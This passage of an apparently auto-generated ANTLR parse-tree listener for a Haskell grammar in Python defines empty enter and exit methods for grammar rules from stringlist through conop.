pass
# Enter a parse tree produced by HaskellParser#stringlist.
def enterStringlist(self, ctx:HaskellParser.StringlistContext):
pass
# Exit a parse tree produced by HaskellParser#stringlist.
def exitStringlist(self, ctx:HaskellParser.StringlistContext):
pass
# Enter a parse tree produced by HaskellParser#annotation.
def enterAnnotation(self, ctx:HaskellParser.AnnotationContext):
pass
# Exit a parse tree produced by HaskellParser#annotation.
def exitAnnotation(self, ctx:HaskellParser.AnnotationContext):
pass
# Enter a parse tree produced by HaskellParser#fdecl.
def enterFdecl(self, ctx:HaskellParser.FdeclContext):
pass
# Exit a parse tree produced by HaskellParser#fdecl.
def exitFdecl(self, ctx:HaskellParser.FdeclContext):
pass
# Enter a parse tree produced by HaskellParser#callconv.
def enterCallconv(self, ctx:HaskellParser.CallconvContext):
pass
# Exit a parse tree produced by HaskellParser#callconv.
def exitCallconv(self, ctx:HaskellParser.CallconvContext):
pass
# Enter a parse tree produced by HaskellParser#safety.
def enterSafety(self, ctx:HaskellParser.SafetyContext):
pass
# Exit a parse tree produced by HaskellParser#safety.
def exitSafety(self, ctx:HaskellParser.SafetyContext):
pass
# Enter a parse tree produced by HaskellParser#fspec.
def enterFspec(self, ctx:HaskellParser.FspecContext):
pass
# Exit a parse tree produced by HaskellParser#fspec.
def exitFspec(self, ctx:HaskellParser.FspecContext):
pass
# Enter a parse tree produced by HaskellParser#opt_sig.
def enterOpt_sig(self, ctx:HaskellParser.Opt_sigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_sig.
def exitOpt_sig(self, ctx:HaskellParser.Opt_sigContext):
pass
# Enter a parse tree produced by HaskellParser#opt_tyconsig.
def enterOpt_tyconsig(self, ctx:HaskellParser.Opt_tyconsigContext):
pass
# Exit a parse tree produced by HaskellParser#opt_tyconsig.
def exitOpt_tyconsig(self, ctx:HaskellParser.Opt_tyconsigContext):
pass
# Enter a parse tree produced by HaskellParser#sigtype.
def enterSigtype(self, ctx:HaskellParser.SigtypeContext):
pass
# Exit a parse tree produced by HaskellParser#sigtype.
def exitSigtype(self, ctx:HaskellParser.SigtypeContext):
pass
# Enter a parse tree produced by HaskellParser#sigtypedoc.
def enterSigtypedoc(self, ctx:HaskellParser.SigtypedocContext):
pass
# Exit a parse tree produced by HaskellParser#sigtypedoc.
def exitSigtypedoc(self, ctx:HaskellParser.SigtypedocContext):
pass
# Enter a parse tree produced by HaskellParser#sig_vars.
def enterSig_vars(self, ctx:HaskellParser.Sig_varsContext):
pass
# Exit a parse tree produced by HaskellParser#sig_vars.
def exitSig_vars(self, ctx:HaskellParser.Sig_varsContext):
pass
# Enter a parse tree produced by HaskellParser#sigtypes1.
def enterSigtypes1(self, ctx:HaskellParser.Sigtypes1Context):
pass
# Exit a parse tree produced by HaskellParser#sigtypes1.
def exitSigtypes1(self, ctx:HaskellParser.Sigtypes1Context):
pass
# Enter a parse tree produced by HaskellParser#unpackedness.
def enterUnpackedness(self, ctx:HaskellParser.UnpackednessContext):
pass
# Exit a parse tree produced by HaskellParser#unpackedness.
def exitUnpackedness(self, ctx:HaskellParser.UnpackednessContext):
pass
# Enter a parse tree produced by HaskellParser#forall_vis_flag.
def enterForall_vis_flag(self, ctx:HaskellParser.Forall_vis_flagContext):
pass
# Exit a parse tree produced by HaskellParser#forall_vis_flag.
def exitForall_vis_flag(self, ctx:HaskellParser.Forall_vis_flagContext):
pass
# Enter a parse tree produced by HaskellParser#ktype.
def enterKtype(self, ctx:HaskellParser.KtypeContext):
pass
# Exit a parse tree produced by HaskellParser#ktype.
def exitKtype(self, ctx:HaskellParser.KtypeContext):
pass
# Enter a parse tree produced by HaskellParser#ktypedoc.
def enterKtypedoc(self, ctx:HaskellParser.KtypedocContext):
pass
# Exit a parse tree produced by HaskellParser#ktypedoc.
def exitKtypedoc(self, ctx:HaskellParser.KtypedocContext):
pass
# Enter a parse tree produced by HaskellParser#ctype.
def enterCtype(self, ctx:HaskellParser.CtypeContext):
pass
# Exit a parse tree produced by HaskellParser#ctype.
def exitCtype(self, ctx:HaskellParser.CtypeContext):
pass
# Enter a parse tree produced by HaskellParser#ctypedoc.
def enterCtypedoc(self, ctx:HaskellParser.CtypedocContext):
pass
# Exit a parse tree produced by HaskellParser#ctypedoc.
def exitCtypedoc(self, ctx:HaskellParser.CtypedocContext):
pass
# Enter a parse tree produced by HaskellParser#tycl_context.
def enterTycl_context(self, ctx:HaskellParser.Tycl_contextContext):
pass
# Exit a parse tree produced by HaskellParser#tycl_context.
def exitTycl_context(self, ctx:HaskellParser.Tycl_contextContext):
pass
# Enter a parse tree produced by HaskellParser#constr_context.
def enterConstr_context(self, ctx:HaskellParser.Constr_contextContext):
pass
# Exit a parse tree produced by HaskellParser#constr_context.
def exitConstr_context(self, ctx:HaskellParser.Constr_contextContext):
pass
# Enter a parse tree produced by HaskellParser#htype.
def enterHtype(self, ctx:HaskellParser.HtypeContext):
pass
# Exit a parse tree produced by HaskellParser#htype.
def exitHtype(self, ctx:HaskellParser.HtypeContext):
pass
# Enter a parse tree produced by HaskellParser#typedoc.
def enterTypedoc(self, ctx:HaskellParser.TypedocContext):
pass
# Exit a parse tree produced by HaskellParser#typedoc.
def exitTypedoc(self, ctx:HaskellParser.TypedocContext):
pass
# Enter a parse tree produced by HaskellParser#constr_btype.
def enterConstr_btype(self, ctx:HaskellParser.Constr_btypeContext):
pass
# Exit a parse tree produced by HaskellParser#constr_btype.
def exitConstr_btype(self, ctx:HaskellParser.Constr_btypeContext):
pass
# Enter a parse tree produced by HaskellParser#constr_tyapps.
def enterConstr_tyapps(self, ctx:HaskellParser.Constr_tyappsContext):
pass
# Exit a parse tree produced by HaskellParser#constr_tyapps.
def exitConstr_tyapps(self, ctx:HaskellParser.Constr_tyappsContext):
pass
# Enter a parse tree produced by HaskellParser#constr_tyapp.
def enterConstr_tyapp(self, ctx:HaskellParser.Constr_tyappContext):
pass
# Exit a parse tree produced by HaskellParser#constr_tyapp.
def exitConstr_tyapp(self, ctx:HaskellParser.Constr_tyappContext):
pass
# Enter a parse tree produced by HaskellParser#btype.
def enterBtype(self, ctx:HaskellParser.BtypeContext):
pass
# Exit a parse tree produced by HaskellParser#btype.
def exitBtype(self, ctx:HaskellParser.BtypeContext):
pass
# Enter a parse tree produced by HaskellParser#tyapps.
def enterTyapps(self, ctx:HaskellParser.TyappsContext):
pass
# Exit a parse tree produced by HaskellParser#tyapps.
def exitTyapps(self, ctx:HaskellParser.TyappsContext):
pass
# Enter a parse tree produced by HaskellParser#tyapp.
def enterTyapp(self, ctx:HaskellParser.TyappContext):
pass
# Exit a parse tree produced by HaskellParser#tyapp.
def exitTyapp(self, ctx:HaskellParser.TyappContext):
pass
# Enter a parse tree produced by HaskellParser#atype.
def enterAtype(self, ctx:HaskellParser.AtypeContext):
pass
# Exit a parse tree produced by HaskellParser#atype.
def exitAtype(self, ctx:HaskellParser.AtypeContext):
pass
# Enter a parse tree produced by HaskellParser#inst_type.
def enterInst_type(self, ctx:HaskellParser.Inst_typeContext):
pass
# Exit a parse tree produced by HaskellParser#inst_type.
def exitInst_type(self, ctx:HaskellParser.Inst_typeContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_types.
def enterDeriv_types(self, ctx:HaskellParser.Deriv_typesContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_types.
def exitDeriv_types(self, ctx:HaskellParser.Deriv_typesContext):
pass
# Enter a parse tree produced by HaskellParser#comma_types.
def enterComma_types(self, ctx:HaskellParser.Comma_typesContext):
pass
# Exit a parse tree produced by HaskellParser#comma_types.
def exitComma_types(self, ctx:HaskellParser.Comma_typesContext):
pass
# Enter a parse tree produced by HaskellParser#bar_types2.
def enterBar_types2(self, ctx:HaskellParser.Bar_types2Context):
pass
# Exit a parse tree produced by HaskellParser#bar_types2.
def exitBar_types2(self, ctx:HaskellParser.Bar_types2Context):
pass
# Enter a parse tree produced by HaskellParser#tv_bndrs.
def enterTv_bndrs(self, ctx:HaskellParser.Tv_bndrsContext):
pass
# Exit a parse tree produced by HaskellParser#tv_bndrs.
def exitTv_bndrs(self, ctx:HaskellParser.Tv_bndrsContext):
pass
# Enter a parse tree produced by HaskellParser#tv_bndr.
def enterTv_bndr(self, ctx:HaskellParser.Tv_bndrContext):
pass
# Exit a parse tree produced by HaskellParser#tv_bndr.
def exitTv_bndr(self, ctx:HaskellParser.Tv_bndrContext):
pass
# Enter a parse tree produced by HaskellParser#tv_bndr_no_braces.
def enterTv_bndr_no_braces(self, ctx:HaskellParser.Tv_bndr_no_bracesContext):
pass
# Exit a parse tree produced by HaskellParser#tv_bndr_no_braces.
def exitTv_bndr_no_braces(self, ctx:HaskellParser.Tv_bndr_no_bracesContext):
pass
# Enter a parse tree produced by HaskellParser#fds.
def enterFds(self, ctx:HaskellParser.FdsContext):
pass
# Exit a parse tree produced by HaskellParser#fds.
def exitFds(self, ctx:HaskellParser.FdsContext):
pass
# Enter a parse tree produced by HaskellParser#fds1.
def enterFds1(self, ctx:HaskellParser.Fds1Context):
pass
# Exit a parse tree produced by HaskellParser#fds1.
def exitFds1(self, ctx:HaskellParser.Fds1Context):
pass
# Enter a parse tree produced by HaskellParser#fd.
def enterFd(self, ctx:HaskellParser.FdContext):
pass
# Exit a parse tree produced by HaskellParser#fd.
def exitFd(self, ctx:HaskellParser.FdContext):
pass
# Enter a parse tree produced by HaskellParser#varids0.
def enterVarids0(self, ctx:HaskellParser.Varids0Context):
pass
# Exit a parse tree produced by HaskellParser#varids0.
def exitVarids0(self, ctx:HaskellParser.Varids0Context):
pass
# Enter a parse tree produced by HaskellParser#kind.
def enterKind(self, ctx:HaskellParser.KindContext):
pass
# Exit a parse tree produced by HaskellParser#kind.
def exitKind(self, ctx:HaskellParser.KindContext):
pass
# Enter a parse tree produced by HaskellParser#gadt_constrlist.
def enterGadt_constrlist(self, ctx:HaskellParser.Gadt_constrlistContext):
pass
# Exit a parse tree produced by HaskellParser#gadt_constrlist.
def exitGadt_constrlist(self, ctx:HaskellParser.Gadt_constrlistContext):
pass
# Enter a parse tree produced by HaskellParser#gadt_constrs.
def enterGadt_constrs(self, ctx:HaskellParser.Gadt_constrsContext):
pass
# Exit a parse tree produced by HaskellParser#gadt_constrs.
def exitGadt_constrs(self, ctx:HaskellParser.Gadt_constrsContext):
pass
# Enter a parse tree produced by HaskellParser#gadt_constr_with_doc.
def enterGadt_constr_with_doc(self, ctx:HaskellParser.Gadt_constr_with_docContext):
pass
# Exit a parse tree produced by HaskellParser#gadt_constr_with_doc.
def exitGadt_constr_with_doc(self, ctx:HaskellParser.Gadt_constr_with_docContext):
pass
# Enter a parse tree produced by HaskellParser#gadt_constr.
def enterGadt_constr(self, ctx:HaskellParser.Gadt_constrContext):
pass
# Exit a parse tree produced by HaskellParser#gadt_constr.
def exitGadt_constr(self, ctx:HaskellParser.Gadt_constrContext):
pass
# Enter a parse tree produced by HaskellParser#constrs.
def enterConstrs(self, ctx:HaskellParser.ConstrsContext):
pass
# Exit a parse tree produced by HaskellParser#constrs.
def exitConstrs(self, ctx:HaskellParser.ConstrsContext):
pass
# Enter a parse tree produced by HaskellParser#constrs1.
def enterConstrs1(self, ctx:HaskellParser.Constrs1Context):
pass
# Exit a parse tree produced by HaskellParser#constrs1.
def exitConstrs1(self, ctx:HaskellParser.Constrs1Context):
pass
# Enter a parse tree produced by HaskellParser#constr.
def enterConstr(self, ctx:HaskellParser.ConstrContext):
pass
# Exit a parse tree produced by HaskellParser#constr.
def exitConstr(self, ctx:HaskellParser.ConstrContext):
pass
# Enter a parse tree produced by HaskellParser#forall.
def enterForall(self, ctx:HaskellParser.ForallContext):
pass
# Exit a parse tree produced by HaskellParser#forall.
def exitForall(self, ctx:HaskellParser.ForallContext):
pass
# Enter a parse tree produced by HaskellParser#constr_stuff.
def enterConstr_stuff(self, ctx:HaskellParser.Constr_stuffContext):
pass
# Exit a parse tree produced by HaskellParser#constr_stuff.
def exitConstr_stuff(self, ctx:HaskellParser.Constr_stuffContext):
pass
# Enter a parse tree produced by HaskellParser#fielddecls.
def enterFielddecls(self, ctx:HaskellParser.FielddeclsContext):
pass
# Exit a parse tree produced by HaskellParser#fielddecls.
def exitFielddecls(self, ctx:HaskellParser.FielddeclsContext):
pass
# Enter a parse tree produced by HaskellParser#fielddecl.
def enterFielddecl(self, ctx:HaskellParser.FielddeclContext):
pass
# Exit a parse tree produced by HaskellParser#fielddecl.
def exitFielddecl(self, ctx:HaskellParser.FielddeclContext):
pass
# Enter a parse tree produced by HaskellParser#derivings.
def enterDerivings(self, ctx:HaskellParser.DerivingsContext):
pass
# Exit a parse tree produced by HaskellParser#derivings.
def exitDerivings(self, ctx:HaskellParser.DerivingsContext):
pass
# Enter a parse tree produced by HaskellParser#deriving.
def enterDeriving(self, ctx:HaskellParser.DerivingContext):
pass
# Exit a parse tree produced by HaskellParser#deriving.
def exitDeriving(self, ctx:HaskellParser.DerivingContext):
pass
# Enter a parse tree produced by HaskellParser#deriv_clause_types.
def enterDeriv_clause_types(self, ctx:HaskellParser.Deriv_clause_typesContext):
pass
# Exit a parse tree produced by HaskellParser#deriv_clause_types.
def exitDeriv_clause_types(self, ctx:HaskellParser.Deriv_clause_typesContext):
pass
# Enter a parse tree produced by HaskellParser#decl_no_th.
def enterDecl_no_th(self, ctx:HaskellParser.Decl_no_thContext):
pass
# Exit a parse tree produced by HaskellParser#decl_no_th.
def exitDecl_no_th(self, ctx:HaskellParser.Decl_no_thContext):
pass
# Enter a parse tree produced by HaskellParser#decl.
def enterDecl(self, ctx:HaskellParser.DeclContext):
pass
# Exit a parse tree produced by HaskellParser#decl.
def exitDecl(self, ctx:HaskellParser.DeclContext):
pass
# Enter a parse tree produced by HaskellParser#rhs.
def enterRhs(self, ctx:HaskellParser.RhsContext):
pass
# Exit a parse tree produced by HaskellParser#rhs.
def exitRhs(self, ctx:HaskellParser.RhsContext):
pass
# Enter a parse tree produced by HaskellParser#gdrhs.
def enterGdrhs(self, ctx:HaskellParser.GdrhsContext):
pass
# Exit a parse tree produced by HaskellParser#gdrhs.
def exitGdrhs(self, ctx:HaskellParser.GdrhsContext):
pass
# Enter a parse tree produced by HaskellParser#gdrh.
def enterGdrh(self, ctx:HaskellParser.GdrhContext):
pass
# Exit a parse tree produced by HaskellParser#gdrh.
def exitGdrh(self, ctx:HaskellParser.GdrhContext):
pass
# Enter a parse tree produced by HaskellParser#sigdecl.
def enterSigdecl(self, ctx:HaskellParser.SigdeclContext):
pass
# Exit a parse tree produced by HaskellParser#sigdecl.
def exitSigdecl(self, ctx:HaskellParser.SigdeclContext):
pass
# Enter a parse tree produced by HaskellParser#activation.
def enterActivation(self, ctx:HaskellParser.ActivationContext):
pass
# Exit a parse tree produced by HaskellParser#activation.
def exitActivation(self, ctx:HaskellParser.ActivationContext):
pass
# Enter a parse tree produced by HaskellParser#th_quasiquote.
def enterTh_quasiquote(self, ctx:HaskellParser.Th_quasiquoteContext):
pass
# Exit a parse tree produced by HaskellParser#th_quasiquote.
def exitTh_quasiquote(self, ctx:HaskellParser.Th_quasiquoteContext):
pass
# Enter a parse tree produced by HaskellParser#th_qquasiquote.
def enterTh_qquasiquote(self, ctx:HaskellParser.Th_qquasiquoteContext):
pass
# Exit a parse tree produced by HaskellParser#th_qquasiquote.
def exitTh_qquasiquote(self, ctx:HaskellParser.Th_qquasiquoteContext):
pass
# Enter a parse tree produced by HaskellParser#quasiquote.
def enterQuasiquote(self, ctx:HaskellParser.QuasiquoteContext):
pass
# Exit a parse tree produced by HaskellParser#quasiquote.
def exitQuasiquote(self, ctx:HaskellParser.QuasiquoteContext):
pass
# Enter a parse tree produced by HaskellParser#exp.
def enterExp(self, ctx:HaskellParser.ExpContext):
pass
# Exit a parse tree produced by HaskellParser#exp.
def exitExp(self, ctx:HaskellParser.ExpContext):
pass
# Enter a parse tree produced by HaskellParser#infixexp.
def enterInfixexp(self, ctx:HaskellParser.InfixexpContext):
pass
# Exit a parse tree produced by HaskellParser#infixexp.
def exitInfixexp(self, ctx:HaskellParser.InfixexpContext):
pass
# Enter a parse tree produced by HaskellParser#exp10p.
def enterExp10p(self, ctx:HaskellParser.Exp10pContext):
pass
# Exit a parse tree produced by HaskellParser#exp10p.
def exitExp10p(self, ctx:HaskellParser.Exp10pContext):
pass
# Enter a parse tree produced by HaskellParser#exp10.
def enterExp10(self, ctx:HaskellParser.Exp10Context):
pass
# Exit a parse tree produced by HaskellParser#exp10.
def exitExp10(self, ctx:HaskellParser.Exp10Context):
pass
# Enter a parse tree produced by HaskellParser#fexp.
def enterFexp(self, ctx:HaskellParser.FexpContext):
pass
# Exit a parse tree produced by HaskellParser#fexp.
def exitFexp(self, ctx:HaskellParser.FexpContext):
pass
# Enter a parse tree produced by HaskellParser#aexp.
def enterAexp(self, ctx:HaskellParser.AexpContext):
pass
# Exit a parse tree produced by HaskellParser#aexp.
def exitAexp(self, ctx:HaskellParser.AexpContext):
pass
# Enter a parse tree produced by HaskellParser#aexp1.
def enterAexp1(self, ctx:HaskellParser.Aexp1Context):
pass
# Exit a parse tree produced by HaskellParser#aexp1.
def exitAexp1(self, ctx:HaskellParser.Aexp1Context):
pass
# Enter a parse tree produced by HaskellParser#aexp2.
def enterAexp2(self, ctx:HaskellParser.Aexp2Context):
pass
# Exit a parse tree produced by HaskellParser#aexp2.
def exitAexp2(self, ctx:HaskellParser.Aexp2Context):
pass
# Enter a parse tree produced by HaskellParser#splice_exp.
def enterSplice_exp(self, ctx:HaskellParser.Splice_expContext):
pass
# Exit a parse tree produced by HaskellParser#splice_exp.
def exitSplice_exp(self, ctx:HaskellParser.Splice_expContext):
pass
# Enter a parse tree produced by HaskellParser#splice_untyped.
def enterSplice_untyped(self, ctx:HaskellParser.Splice_untypedContext):
pass
# Exit a parse tree produced by HaskellParser#splice_untyped.
def exitSplice_untyped(self, ctx:HaskellParser.Splice_untypedContext):
pass
# Enter a parse tree produced by HaskellParser#splice_typed.
def enterSplice_typed(self, ctx:HaskellParser.Splice_typedContext):
pass
# Exit a parse tree produced by HaskellParser#splice_typed.
def exitSplice_typed(self, ctx:HaskellParser.Splice_typedContext):
pass
# Enter a parse tree produced by HaskellParser#cmdargs.
def enterCmdargs(self, ctx:HaskellParser.CmdargsContext):
pass
# Exit a parse tree produced by HaskellParser#cmdargs.
def exitCmdargs(self, ctx:HaskellParser.CmdargsContext):
pass
# Enter a parse tree produced by HaskellParser#acmd.
def enterAcmd(self, ctx:HaskellParser.AcmdContext):
pass
# Exit a parse tree produced by HaskellParser#acmd.
def exitAcmd(self, ctx:HaskellParser.AcmdContext):
pass
# Enter a parse tree produced by HaskellParser#cvtopbody.
def enterCvtopbody(self, ctx:HaskellParser.CvtopbodyContext):
pass
# Exit a parse tree produced by HaskellParser#cvtopbody.
def exitCvtopbody(self, ctx:HaskellParser.CvtopbodyContext):
pass
# Enter a parse tree produced by HaskellParser#cvtopdecls0.
def enterCvtopdecls0(self, ctx:HaskellParser.Cvtopdecls0Context):
pass
# Exit a parse tree produced by HaskellParser#cvtopdecls0.
def exitCvtopdecls0(self, ctx:HaskellParser.Cvtopdecls0Context):
pass
# Enter a parse tree produced by HaskellParser#texp.
def enterTexp(self, ctx:HaskellParser.TexpContext):
pass
# Exit a parse tree produced by HaskellParser#texp.
def exitTexp(self, ctx:HaskellParser.TexpContext):
pass
# Enter a parse tree produced by HaskellParser#tup_exprs.
def enterTup_exprs(self, ctx:HaskellParser.Tup_exprsContext):
pass
# Exit a parse tree produced by HaskellParser#tup_exprs.
def exitTup_exprs(self, ctx:HaskellParser.Tup_exprsContext):
pass
# Enter a parse tree produced by HaskellParser#commas_tup_tail.
def enterCommas_tup_tail(self, ctx:HaskellParser.Commas_tup_tailContext):
pass
# Exit a parse tree produced by HaskellParser#commas_tup_tail.
def exitCommas_tup_tail(self, ctx:HaskellParser.Commas_tup_tailContext):
pass
# Enter a parse tree produced by HaskellParser#tup_tail.
def enterTup_tail(self, ctx:HaskellParser.Tup_tailContext):
pass
# Exit a parse tree produced by HaskellParser#tup_tail.
def exitTup_tail(self, ctx:HaskellParser.Tup_tailContext):
pass
# Enter a parse tree produced by HaskellParser#lst.
def enterLst(self, ctx:HaskellParser.LstContext):
pass
# Exit a parse tree produced by HaskellParser#lst.
def exitLst(self, ctx:HaskellParser.LstContext):
pass
# Enter a parse tree produced by HaskellParser#lexps.
def enterLexps(self, ctx:HaskellParser.LexpsContext):
pass
# Exit a parse tree produced by HaskellParser#lexps.
def exitLexps(self, ctx:HaskellParser.LexpsContext):
pass
# Enter a parse tree produced by HaskellParser#flattenedpquals.
def enterFlattenedpquals(self, ctx:HaskellParser.FlattenedpqualsContext):
pass
# Exit a parse tree produced by HaskellParser#flattenedpquals.
def exitFlattenedpquals(self, ctx:HaskellParser.FlattenedpqualsContext):
pass
# Enter a parse tree produced by HaskellParser#pquals.
def enterPquals(self, ctx:HaskellParser.PqualsContext):
pass
# Exit a parse tree produced by HaskellParser#pquals.
def exitPquals(self, ctx:HaskellParser.PqualsContext):
pass
# Enter a parse tree produced by HaskellParser#squals.
def enterSquals(self, ctx:HaskellParser.SqualsContext):
pass
# Exit a parse tree produced by HaskellParser#squals.
def exitSquals(self, ctx:HaskellParser.SqualsContext):
pass
# Enter a parse tree produced by HaskellParser#transformqual.
def enterTransformqual(self, ctx:HaskellParser.TransformqualContext):
pass
# Exit a parse tree produced by HaskellParser#transformqual.
def exitTransformqual(self, ctx:HaskellParser.TransformqualContext):
pass
# Enter a parse tree produced by HaskellParser#guards.
def enterGuards(self, ctx:HaskellParser.GuardsContext):
pass
# Exit a parse tree produced by HaskellParser#guards.
def exitGuards(self, ctx:HaskellParser.GuardsContext):
pass
# Enter a parse tree produced by HaskellParser#guard.
def enterGuard(self, ctx:HaskellParser.GuardContext):
pass
# Exit a parse tree produced by HaskellParser#guard.
def exitGuard(self, ctx:HaskellParser.GuardContext):
pass
# Enter a parse tree produced by HaskellParser#alts.
def enterAlts(self, ctx:HaskellParser.AltsContext):
pass
# Exit a parse tree produced by HaskellParser#alts.
def exitAlts(self, ctx:HaskellParser.AltsContext):
pass
# Enter a parse tree produced by HaskellParser#alt.
def enterAlt(self, ctx:HaskellParser.AltContext):
pass
# Exit a parse tree produced by HaskellParser#alt.
def exitAlt(self, ctx:HaskellParser.AltContext):
pass
# Enter a parse tree produced by HaskellParser#alt_rhs.
def enterAlt_rhs(self, ctx:HaskellParser.Alt_rhsContext):
pass
# Exit a parse tree produced by HaskellParser#alt_rhs.
def exitAlt_rhs(self, ctx:HaskellParser.Alt_rhsContext):
pass
# Enter a parse tree produced by HaskellParser#ralt.
def enterRalt(self, ctx:HaskellParser.RaltContext):
pass
# Exit a parse tree produced by HaskellParser#ralt.
def exitRalt(self, ctx:HaskellParser.RaltContext):
pass
# Enter a parse tree produced by HaskellParser#gdpats.
def enterGdpats(self, ctx:HaskellParser.GdpatsContext):
pass
# Exit a parse tree produced by HaskellParser#gdpats.
def exitGdpats(self, ctx:HaskellParser.GdpatsContext):
pass
# Enter a parse tree produced by HaskellParser#ifgdpats.
def enterIfgdpats(self, ctx:HaskellParser.IfgdpatsContext):
pass
# Exit a parse tree produced by HaskellParser#ifgdpats.
def exitIfgdpats(self, ctx:HaskellParser.IfgdpatsContext):
pass
# Enter a parse tree produced by HaskellParser#gdpat.
def enterGdpat(self, ctx:HaskellParser.GdpatContext):
pass
# Exit a parse tree produced by HaskellParser#gdpat.
def exitGdpat(self, ctx:HaskellParser.GdpatContext):
pass
# Enter a parse tree produced by HaskellParser#pat.
def enterPat(self, ctx:HaskellParser.PatContext):
pass
# Exit a parse tree produced by HaskellParser#pat.
def exitPat(self, ctx:HaskellParser.PatContext):
pass
# Enter a parse tree produced by HaskellParser#bindpat.
def enterBindpat(self, ctx:HaskellParser.BindpatContext):
pass
# Exit a parse tree produced by HaskellParser#bindpat.
def exitBindpat(self, ctx:HaskellParser.BindpatContext):
pass
# Enter a parse tree produced by HaskellParser#apat.
def enterApat(self, ctx:HaskellParser.ApatContext):
pass
# Exit a parse tree produced by HaskellParser#apat.
def exitApat(self, ctx:HaskellParser.ApatContext):
pass
# Enter a parse tree produced by HaskellParser#apats.
def enterApats(self, ctx:HaskellParser.ApatsContext):
pass
# Exit a parse tree produced by HaskellParser#apats.
def exitApats(self, ctx:HaskellParser.ApatsContext):
pass
# Enter a parse tree produced by HaskellParser#fpat.
def enterFpat(self, ctx:HaskellParser.FpatContext):
pass
# Exit a parse tree produced by HaskellParser#fpat.
def exitFpat(self, ctx:HaskellParser.FpatContext):
pass
# Enter a parse tree produced by HaskellParser#stmtlist.
def enterStmtlist(self, ctx:HaskellParser.StmtlistContext):
pass
# Exit a parse tree produced by HaskellParser#stmtlist.
def exitStmtlist(self, ctx:HaskellParser.StmtlistContext):
pass
# Enter a parse tree produced by HaskellParser#stmts.
def enterStmts(self, ctx:HaskellParser.StmtsContext):
pass
# Exit a parse tree produced by HaskellParser#stmts.
def exitStmts(self, ctx:HaskellParser.StmtsContext):
pass
# Enter a parse tree produced by HaskellParser#stmt.
def enterStmt(self, ctx:HaskellParser.StmtContext):
pass
# Exit a parse tree produced by HaskellParser#stmt.
def exitStmt(self, ctx:HaskellParser.StmtContext):
pass
# Enter a parse tree produced by HaskellParser#qual.
def enterQual(self, ctx:HaskellParser.QualContext):
pass
# Exit a parse tree produced by HaskellParser#qual.
def exitQual(self, ctx:HaskellParser.QualContext):
pass
# Enter a parse tree produced by HaskellParser#fbinds.
def enterFbinds(self, ctx:HaskellParser.FbindsContext):
pass
# Exit a parse tree produced by HaskellParser#fbinds.
def exitFbinds(self, ctx:HaskellParser.FbindsContext):
pass
# Enter a parse tree produced by HaskellParser#fbind.
def enterFbind(self, ctx:HaskellParser.FbindContext):
pass
# Exit a parse tree produced by HaskellParser#fbind.
def exitFbind(self, ctx:HaskellParser.FbindContext):
pass
# Enter a parse tree produced by HaskellParser#dbinds.
def enterDbinds(self, ctx:HaskellParser.DbindsContext):
pass
# Exit a parse tree produced by HaskellParser#dbinds.
def exitDbinds(self, ctx:HaskellParser.DbindsContext):
pass
# Enter a parse tree produced by HaskellParser#dbind.
def enterDbind(self, ctx:HaskellParser.DbindContext):
pass
# Exit a parse tree produced by HaskellParser#dbind.
def exitDbind(self, ctx:HaskellParser.DbindContext):
pass
# Enter a parse tree produced by HaskellParser#name_boolformula_opt.
def enterName_boolformula_opt(self, ctx:HaskellParser.Name_boolformula_optContext):
pass
# Exit a parse tree produced by HaskellParser#name_boolformula_opt.
def exitName_boolformula_opt(self, ctx:HaskellParser.Name_boolformula_optContext):
pass
# Enter a parse tree produced by HaskellParser#name_boolformula_and.
def enterName_boolformula_and(self, ctx:HaskellParser.Name_boolformula_andContext):
pass
# Exit a parse tree produced by HaskellParser#name_boolformula_and.
def exitName_boolformula_and(self, ctx:HaskellParser.Name_boolformula_andContext):
pass
# Enter a parse tree produced by HaskellParser#name_boolformula_and_list.
def enterName_boolformula_and_list(self, ctx:HaskellParser.Name_boolformula_and_listContext):
pass
# Exit a parse tree produced by HaskellParser#name_boolformula_and_list.
def exitName_boolformula_and_list(self, ctx:HaskellParser.Name_boolformula_and_listContext):
pass
# Enter a parse tree produced by HaskellParser#name_boolformula_atom.
def enterName_boolformula_atom(self, ctx:HaskellParser.Name_boolformula_atomContext):
pass
# Exit a parse tree produced by HaskellParser#name_boolformula_atom.
def exitName_boolformula_atom(self, ctx:HaskellParser.Name_boolformula_atomContext):
pass
# Enter a parse tree produced by HaskellParser#namelist.
def enterNamelist(self, ctx:HaskellParser.NamelistContext):
pass
# Exit a parse tree produced by HaskellParser#namelist.
def exitNamelist(self, ctx:HaskellParser.NamelistContext):
pass
# Enter a parse tree produced by HaskellParser#name_var.
def enterName_var(self, ctx:HaskellParser.Name_varContext):
pass
# Exit a parse tree produced by HaskellParser#name_var.
def exitName_var(self, ctx:HaskellParser.Name_varContext):
pass
# Enter a parse tree produced by HaskellParser#qcon_nowiredlist.
def enterQcon_nowiredlist(self, ctx:HaskellParser.Qcon_nowiredlistContext):
pass
# Exit a parse tree produced by HaskellParser#qcon_nowiredlist.
def exitQcon_nowiredlist(self, ctx:HaskellParser.Qcon_nowiredlistContext):
pass
# Enter a parse tree produced by HaskellParser#qcon.
def enterQcon(self, ctx:HaskellParser.QconContext):
pass
# Exit a parse tree produced by HaskellParser#qcon.
def exitQcon(self, ctx:HaskellParser.QconContext):
pass
# Enter a parse tree produced by HaskellParser#gen_qcon.
def enterGen_qcon(self, ctx:HaskellParser.Gen_qconContext):
pass
# Exit a parse tree produced by HaskellParser#gen_qcon.
def exitGen_qcon(self, ctx:HaskellParser.Gen_qconContext):
pass
# Enter a parse tree produced by HaskellParser#con.
def enterCon(self, ctx:HaskellParser.ConContext):
pass
# Exit a parse tree produced by HaskellParser#con.
def exitCon(self, ctx:HaskellParser.ConContext):
pass
# Enter a parse tree produced by HaskellParser#con_list.
def enterCon_list(self, ctx:HaskellParser.Con_listContext):
pass
# Exit a parse tree produced by HaskellParser#con_list.
def exitCon_list(self, ctx:HaskellParser.Con_listContext):
pass
# Enter a parse tree produced by HaskellParser#sysdcon_nolist.
def enterSysdcon_nolist(self, ctx:HaskellParser.Sysdcon_nolistContext):
pass
# Exit a parse tree produced by HaskellParser#sysdcon_nolist.
def exitSysdcon_nolist(self, ctx:HaskellParser.Sysdcon_nolistContext):
pass
# Enter a parse tree produced by HaskellParser#sysdcon.
def enterSysdcon(self, ctx:HaskellParser.SysdconContext):
pass
# Exit a parse tree produced by HaskellParser#sysdcon.
def exitSysdcon(self, ctx:HaskellParser.SysdconContext):
pass
# Enter a parse tree produced by HaskellParser#conop.
def enterConop(self, ctx:HaskellParser.ConopContext):
pass
